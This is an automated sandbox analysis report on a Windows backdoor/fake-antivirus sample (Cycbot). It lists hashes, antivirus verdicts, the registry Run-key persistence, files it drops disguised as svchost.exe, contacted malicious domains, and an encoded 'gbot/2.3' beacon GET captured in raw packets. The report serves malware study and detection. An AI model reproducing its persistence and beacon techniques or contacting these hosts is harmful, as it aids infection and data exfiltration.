Analysis Date: 2015-01-27 06:02:40
MD5: 38f29182e31e79942f9009b2c724d3d1
SHA1: cb5c24fae519d1b3e001e719b4cb0ea5587b7db9

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: a9b8eb68e5c5cfd3e9205297220f5fdb sha1: a597b35e3a6a358368239de0becd140699736609 size: 101888
Section .rdata md5: cc5b45ae298e99fae741d5fc19f390bd sha1: 948d3352811008a97c0063a80af846d3d809c788 size: 2048
Section .data md5: 06e3482dfeca14abc5bb89e853cbf3c8 sha1: d746d9671b9a56fbce1460691e31411a2ef424c5 size: 14336
Section .rsrc md5: 3e9fd73291bc841f731d1e8d05068e06 sha1: 68ef3fa288a26fdde780fbadf0e726d3df1af471 size: 1024
Timestamp: 2005-11-25 15:01:34
Version PrivateBuild: 1058
FileDescription: Windows Host Process
PEhash: 74d4a0c82436eb2112cf99f75a171240901aedd2
IMPhash: 5271c4eaa82c628475473a6b485e607b
AV 360 Safe: no_virus
AV Ad-Aware: Gen:Trojan.Heur.KS.2
AV Alwil (avast): Cybota [Trj]
AV Arcabit (arcavir): Gen:Trojan.Heur.KS.2
AV Authentium: W32/Goolbot.B.gen!Eldorado
AV Avira (antivir): TR/Crypt.XPACK.Gen3
AV BullGuard: Gen:Trojan.Heur.KS.2
AV CA (E-Trust Ino): Win32/FakeSpypro.B!generic
AV CAT (quickheal): Backdoor.Cycbot.B
AV ClamAV: Trojan.Agent-217014
AV Dr. Web: Trojan.Siggen2.8177
AV Emsisoft: Gen:Trojan.Heur.KS.2
AV Eset (nod32): Win32/Cycbot.AA
AV Fortinet: W32/FakeAV.PACK!tr
AV Frisk (f-prot): W32/Goolbot.B.gen!Eldorado
AV F-Secure: Gen:Trojan.Heur.KS.2
AV Grisoft (avg): Citem.DVA
AV Ikarus: Trojan.Win32.FakeAV
AV K7: Backdoor ( 003210941 )
AV Kaspersky: Packed.Win32.Krap.hy
AV MalwareBytes: Trojan.Agent.Gen
AV Mcafee: BackDoor-EXI.gen.d
AV Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV MicroWorld (escan): Gen:Trojan.Heur.KS.2
AV Rising: no_virus
AV Sophos: Troj/FakeAV-BZD
AV Symantec: Trojan.FakeAV!gen39
AV Trend Micro: BKDR_CYCBOT.SME
AV VirusBlokAda (vba32): no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost ➝ C:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe
Creates File C:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe
Creates File C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File PIPE\lsarpc
Creates File \Device\Afd\Endpoint
Creates File C:\Documents and Settings\Administrator\Application Data\Microsoft\stor.cfg
Creates File C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process C:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe
Creates Process C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Process C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows
Creates Mutex {A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex WininetConnectionMutex
Creates Mutex c:!documents and settings!administrator!cookies!
Creates Mutex {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex {7791C364-DE4E-4000-9E92-9CCAFDDD90DC}
Creates Mutex {C66E79CE-8935-4ed9-A6B1-4983619CB925}
Creates Mutex c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS www.google.com
Winsock DNS www.pcdocpro.com
Winsock DNS 127.0.0.1
Winsock DNS blogsmonitoringservice.com
Winsock DNS findeffectivecasino.com
Winsock DNS bigtelevideochanel.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process C:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows

Creates Process C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe

Network Details:

DNS pcdocpro.com Type: A 209.59.161.20
DNS www.google.com Type: A 74.125.196.105
DNS www.google.com Type: A 74.125.196.106
DNS www.google.com Type: A 74.125.196.147
DNS www.google.com Type: A 74.125.196.99
DNS www.google.com Type: A 74.125.196.103
DNS www.google.com Type: A 74.125.196.104
DNS www.pcdocpro.com Type: A
DNS blogsmonitoringservice.com Type: A
DNS bigtelevideochanel.com Type: A
DNS protectyourpc-11.com Type: A
DNS findeffectivecasino.com Type: A
HTTP GET http://www.pcdocpro.com/images/logo-3.jpg?tq=gP4aKydKjynOzpIVkB5XdapacC7DDrssTc323m1hEaJZ%2F57TgsjZV1JiKmKmoR9wb%2FX1ZlMkgT3%2B%2Bv8oXis%2FjRpr2PK3EQBgkh6rUXH8%2BG7l5zT8TLcwOVQdolDdgS9i1rpBxmuRmZb14tI2bP6VeoIfpQ8BC%2B8eWDqf35IKh2gXBFj%2F4WQVc0XZ%2F4%2FL18F9QTFsu3eQ2DSyejr%2BwIkZPgG01FSi%2B0fmqCEReK4Ltq4vWvpcON%2FI%2FUdYQf%2BunOTDs3t1QZeiPRb1xRlAXNpL03ksauKY3zp5fcKBMMY9iiEt4xnTVxpK3zjZabAI2JpyKYhcYLtFxE5%2By
User-Agent: gbot/2.3
HTTP GET http://www.google.com/
User-Agent:
HTTP GET http://www.google.com/
User-Agent:
Flows TCP 192.168.1.1:1031 ➝ 209.59.161.20:80
Flows TCP 192.168.1.1:1032 ➝ 74.125.196.105:80
Flows TCP 192.168.1.1:1033 ➝ 74.125.196.105:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 6c6f676f   GET /images/logo
0x00000010 (00016)   2d332e6a 70673f74 713d6750 34614b79   -3.jpg?tq=gP4aKy
0x00000020 (00032)   644b6a79 6e4f7a70 49566b42 35586461   dKjynOzpIVkB5Xda
0x00000030 (00048)   70616343 37444472 73735463 3332336d   pacC7DDrssTc323m
0x00000040 (00064)   31684561 4a5a2532 46353754 67736a5a   1hEaJZ%2F57TgsjZ
0x00000050 (00080)   56314a69 4b6d4b6d 6f523977 62253246   V1JiKmKmoR9wb%2F
0x00000060 (00096)   58315a6c 4d6b6754 33253242 25324276   X1ZlMkgT3%2B%2Bv
0x00000070 (00112)   386f5869 73253246 6a527072 32504b33   8oXis%2FjRpr2PK3
0x00000080 (00128)   45514267 6b683672 55584838 25324247   EQBgkh6rUXH8%2BG
0x00000090 (00144)   376c357a 5438544c 63774f56 51646f6c   7l5zT8TLcwOVQdol
0x000000a0 (00160)   44646753 39693172 7042786d 75526d5a   DdgS9i1rpBxmuRmZ
0x000000b0 (00176)   62313474 49326250 3656656f 49667051   b14tI2bP6VeoIfpQ
0x000000c0 (00192)   38424325 32423865 57447166 3335494b   8BC%2B8eWDqf35IK
0x000000d0 (00208)   68326758 42466a25 32463457 51566330   h2gXBFj%2F4WQVc0
0x000000e0 (00224)   585a2532 46342532 464c3138 46395154   XZ%2F4%2FL18F9QT
0x000000f0 (00240)   46737533 65513244 5379656a 72253242   Fsu3eQ2DSyejr%2B
0x00000100 (00256)   77496b5a 50674730 31465369 25324230   wIkZPgG01FSi%2B0
0x00000110 (00272)   666d7143 4552654b 344c7471 34765776   fmqCEReK4Ltq4vWv
0x00000120 (00288)   70634f4e 25324649 25324655 64595166   pcON%2FI%2FUdYQf
0x00000130 (00304)   25324275 6e4f5444 73337431 515a6569   %2BunOTDs3t1QZei
0x00000140 (00320)   50526231 78526c41 584e704c 30336b73   PRb1xRlAXNpL03ks
0x00000150 (00336)   61754b59 337a7035 66634b42 4d4d5939   auKY3zp5fcKBMMY9
0x00000160 (00352)   69694574 34786e54 5678704b 337a6a5a   iiEt4xnTVxpK3zjZ
0x00000170 (00368)   61624149 324a7079 4b596863 594c7446   abAI2JpyKYhcYLtF
0x00000180 (00384)   78453525 32427920 48545450 2f312e30   xE5%2By HTTP/1.0
0x00000190 (00400)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x000001a0 (00416)   6f73650d 0a486f73 743a2077 77772e70   ose..Host: www.p
0x000001b0 (00432)   63646f63 70726f2e 636f6d0d 0a416363   cdocpro.com..Acc
0x000001c0 (00448)   6570743a 202a2f2a 0d0a5573 65722d41   ept: */*..User-A
0x000001d0 (00464)   67656e74 3a206762 6f742f32 2e330d0a   gent: gbot/2.3..
0x000001e0 (00480)   0d0a                                  ..

0x00000000 (00000)   47455420 2f204854 54502f31 2e300d0a   GET / HTTP/1.0..
0x00000010 (00016)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000020 (00032)   650d0a48 6f73743a 20777777 2e676f6f   e..Host: www.goo
0x00000030 (00048)   676c652e 636f6d0d 0a416363 6570743a   gle.com..Accept:
0x00000040 (00064)   202a2f2a 0d0a0d0a 46353754 67736a5a    */*....F57TgsjZ
0x00000050 (00080)   56314a69 4b6d4b6d 6f523977 62253246   V1JiKmKmoR9wb%2F
0x00000060 (00096)   58315a6c 4d6b6754 33253242 25324276   X1ZlMkgT3%2B%2Bv
0x00000070 (00112)   386f5869 73253246 6a527072 32504b33   8oXis%2FjRpr2PK3
0x00000080 (00128)   45514267 6b683672 55584838 25324247   EQBgkh6rUXH8%2BG
0x00000090 (00144)   376c357a 5438544c 63774f56 51646f6c   7l5zT8TLcwOVQdol
0x000000a0 (00160)   44646753 39693172 7042786d 75526d5a   DdgS9i1rpBxmuRmZ
0x000000b0 (00176)   62313474 49326250 3656656f 49667051   b14tI2bP6VeoIfpQ
0x000000c0 (00192)   38424325 32423865 57447166 3335494b   8BC%2B8eWDqf35IK
0x000000d0 (00208)   68326758 42466a25 32463457 51566330   h2gXBFj%2F4WQVc0
0x000000e0 (00224)   585a2532 46342532 464c3138 46395154   XZ%2F4%2FL18F9QT
0x000000f0 (00240)   46737533 65513244 5379656a 72253242   Fsu3eQ2DSyejr%2B
0x00000100 (00256)   77496b5a 50674730 31465369 25324230   wIkZPgG01FSi%2B0
0x00000110 (00272)   666d7143 4552654b 344c7471 34765776   fmqCEReK4Ltq4vWv
0x00000120 (00288)   70634f4e 25324649 25324655 64595166   pcON%2FI%2FUdYQf
0x00000130 (00304)   25324275 6e4f5444 73337431 515a6569   %2BunOTDs3t1QZei
0x00000140 (00320)   50526231 78526c41 584e704c 30336b73   PRb1xRlAXNpL03ks
0x00000150 (00336)   61754b59 337a7035 66634b42 4d4d5939   auKY3zp5fcKBMMY9
0x00000160 (00352)   69694574 34786e54 5678704b 337a6a5a   iiEt4xnTVxpK3zjZ
0x00000170 (00368)   61624149 324a7079 4b596863 594c7446   abAI2JpyKYhcYLtF
0x00000180 (00384)   78453525 32427920 48545450 2f312e30   xE5%2By HTTP/1.0
0x00000190 (00400)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x000001a0 (00416)   6f73650d 0a486f73 743a2077 77772e70   ose..Host: www.p
0x000001b0 (00432)   63646f63 70726f2e 636f6d0d 0a416363   cdocpro.com..Acc
0x000001c0 (00448)   6570743a 202a2f2a 0d0a5573 65722d41   ept: */*..User-A
0x000001d0 (00464)   67656e74 3a206762 6f742f32 2e330d0a   gent: gbot/2.3..
0x000001e0 (00480)   0d0a                                  ..

0x00000000 (00000)   47455420 2f204854 54502f31 2e300d0a   GET / HTTP/1.0..
0x00000010 (00016)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000020 (00032)   650d0a48 6f73743a 20777777 2e676f6f   e..Host: www.goo
0x00000030 (00048)   676c652e 636f6d0d 0a416363 6570743a   gle.com..Accept:
0x00000040 (00064)   202a2f2a 0d0a0d0a 46353754 67736a5a    */*....F57TgsjZ
0x00000050 (00080)   56314a69 4b6d4b6d 6f523977 62253246   V1JiKmKmoR9wb%2F
0x00000060 (00096)   58315a6c 4d6b6754 33253242 25324276   X1ZlMkgT3%2B%2Bv
0x00000070 (00112)   386f5869 73253246 6a527072 32504b33   8oXis%2FjRpr2PK3
0x00000080 (00128)   45514267 6b683672 55584838 25324247   EQBgkh6rUXH8%2BG
0x00000090 (00144)   376c357a 5438544c 63774f56 51646f6c   7l5zT8TLcwOVQdol
0x000000a0 (00160)   44646753 39693172 7042786d 75526d5a   DdgS9i1rpBxmuRmZ
0x000000b0 (00176)   62313474 49326250 3656656f 49667051   b14tI2bP6VeoIfpQ
0x000000c0 (00192)   38424325 32423865 57447166 3335494b   8BC%2B8eWDqf35IK
0x000000d0 (00208)   68326758 42466a25 32463457 51566330   h2gXBFj%2F4WQVc0
0x000000e0 (00224)   585a2532 46342532 464c3138 46395154   XZ%2F4%2FL18F9QT
0x000000f0 (00240)   46737533 65513244 5379656a 72253242   Fsu3eQ2DSyejr%2B
0x00000100 (00256)   77496b5a 50674730 31465369 25324230   wIkZPgG01FSi%2B0
0x00000110 (00272)   666d7143 4552654b 344c7471 34765776   fmqCEReK4Ltq4vWv
0x00000120 (00288)   70634f4e 25324649 25324655 64595166   pcON%2FI%2FUdYQf
0x00000130 (00304)   25324275 6e4f5444 73337431 515a6569   %2BunOTDs3t1QZei
0x00000140 (00320)   50526231 78526c41 584e704c 30336b73   PRb1xRlAXNpL03ks
0x00000150 (00336)   61754b59 337a7035 66634b42 4d4d5939   auKY3zp5fcKBMMY9
0x00000160 (00352)   69694574 34786e54 5678704b 337a6a5a   iiEt4xnTVxpK3zjZ
0x00000170 (00368)   61624149 324a7079 4b596863 594c7446   abAI2JpyKYhcYLtF
0x00000180 (00384)   78453525 32427920 48545450 2f312e30   xE5%2By HTTP/1.0
0x00000190 (00400)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x000001a0 (00416)   6f73650d 0a486f73 743a2077 77772e70   ose..Host: www.p
0x000001b0 (00432)   63646f63 70726f2e 636f6d0d 0a416363   cdocpro.com..Acc
0x000001c0 (00448)   6570743a 202a2f2a 0d0a5573 65722d41   ept: */*..User-A
0x000001d0 (00464)   67656e74 3a206762 6f742f32 2e330d0a   gent: gbot/2.3..
0x000001e0 (00480)   0d0a                                  ..


Strings
.
040904b0
1058
FileDescription
&Main
MS Sans Serif
PrivateBuild
S&top
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
Windows Host Process
2=2,ft
2cCc\Nn
2ccYft
4NdthV
5^GtuS
,6 |N/
6nA%OC
+;6yFt
8$tOzdtJ
8\YYl{
9>Gt]1
9Hk;uM
>]9nLJi
ADVAPI32.dll
/&@Ae%Y
B"B!Ma
CancelWaitableTimer
cBc!CBy
cdIc-H
CertEnumSystemStoreLocation
cjTVDt
cjYcBH
CloseHandle
ClosePrinter
cNNc=9{
CoInitialize
COMCTL32.dll
CommandLineToArgvW
ConvertSidToStringSidW
ConvertStringSidToSidW
CopySid
CoUninitialize
CRYPT32.dll
CryptMsgClose
CryptMsgGetParam
d>8T^T
@.data
dC@-hT
?De_wJ
& dnt^
DocumentPropertiesA
Dt8|kl{
Dt/,Et
DtHl>J
]Dto4J
dt>$t!
Dty;Gt_
E6Us~l
Et8?]W
etdt?U
=Et<$t
Et=$tQ
ExitProcess
ft9Tje
FtftUl
FtgtL~
ftHi;7
ftj9]DtK
ft>*?T
|]Ft&t
>Ft{tdt
ftWH]"
g`CEGC
GetCommandLineW
GetCurrentProcess
GetCurrentProcessId
GetCurrentThread
GetCurrentThreadId
GetLastError
GetLengthSid
GetModuleHandleA
GetSidIdentifierAuthority
GetSidSubAuthority
GetSidSubAuthorityCount
GetStartupInfoA
GetSystemTimeAsFileTime
GetTickCount
GetTokenInformation
/GtDtTQ
Gt[Gt5
gt:GtA
gtGtetm/
-gt	Jr
;Gt	)JY^M
+G_)xtd/r
,Hco"b
hHhNo@
~hhLoca
'Hi6U8
hj@h`L@
hLibrh
\hThib@
IF'9(D
.=i:.k
InterlockedCompareExchange
InterlockedExchange
IsValidSid
iwXZ]y0
J7O=Ft-W
JdtWEt
j@hFR@
Jpvr/QU
j@w97aw
 Jx-@O
JX.%rgN
KERNEL32.dll
)KliM:
k%t&tx
%	lHb4>Z]q
llsGV,
LoadIconW
LoadStringW
LocalAlloc
LocalFree
L$TQ@P
Lvetz.
*LwFt~
m9GtLy
MessageBoxW
{mgtYl"
NcccEt>
nE1$M*
NETAPI32.dll
NetApiBufferFree
NetUserModalsGet
NGt7Z)W
N(zOl{
odtm+B
O"JMCv
ole32.dll
OMK;ft
OpenPrinterA
OpenProcessToken
OpenThreadToken
?O&t<=
O%tz*Et
OV:Gt	"
p&mOju{N
PostMessageW
ProcessIdToSessionId
PropertySheetW
(]&Q4@
QueryPerformanceCounter
r0	@Bf
`.rdata
RegCloseKey
RegEnumKeyExW
RegEnumValueW
RegOpenKeyExW
r,fbp^
SetUnhandledExceptionFilter
SHELL32.dll
.[szr6B
$t4l/ets
t4TgtA
$t~5u]
t6Ft];x
&t7j8l
t8Ft't	?
t8Hx=^
t8'txgt
t:9<EtR
t9?}gt
T9IEtM
&t9Jtw
tDtet't`
$tDtFtb
t-dtgt
t\?dtm
tdtvgt-dt
TerminateProcess
t]Et,2
t:EtMi
tEt'tnl
't^etuw
]&t<ft
tFtGtK
tftGtt^Ir
t+FtZ't3
tGt^6k3
tgtKgt@
t;-gt&t
$tGt't%t
tgt&tXh
tgtVTShM
!This program cannot be run in DOS mode.
tHl%ta
tIft&t
'tiIM2
tIO;+#
tIuGtet
$tI/)v
tJ/LOP
	'tK)%t
tk\[YdtJ
tL:Etgt
tlEt't
tLEt$tl
%t>lH%tN8
%t\L't
tm'tXq
*~$t]n
'tn\l't
t\N<^n
Tq+mbv
;'t't{
$t{;$t
t:&t8gt
t$t8L-
.&t&ta
t&tdt4
t$tftetL
t%tFto
tThrote
t$tNgt
t%t+}q
t't<&t
t%t'tB
tt&tIEt
t't:=V;
t$tVdtK
t$tX5|
t%t*{y
t'tY=xL
tuGthGt
$tu=^K\
tu[+\v3
tVdtW]
tVX*H>
tWEty7
$t*Wk[
'twO||
tw&t4't%t
'twu	Et
txgtTb
tX~N%t
t}X&tI-
ty6?|8
t+Y\H"
	'tY't
&t?Z[ 
tZlet9
tZUmgt
~udtx$t
]uet=b
<[-?uK
UnhandledExceptionFilter
USER32.dll
u%tl9[
Uu$tW5
(>vTgt
WINSPOOL.DRV
WN{|Ml*}.
w<_@v.
Wy	4n5
WZDtDt
x<77jH
*X?|b'
XEtZ?mUw
xU7gC=
Y5JoV/
{YdtJ.
YEtDtdt$tP
yXEtNT
ZDt(I=
Z	&tgt
Z?Wdtft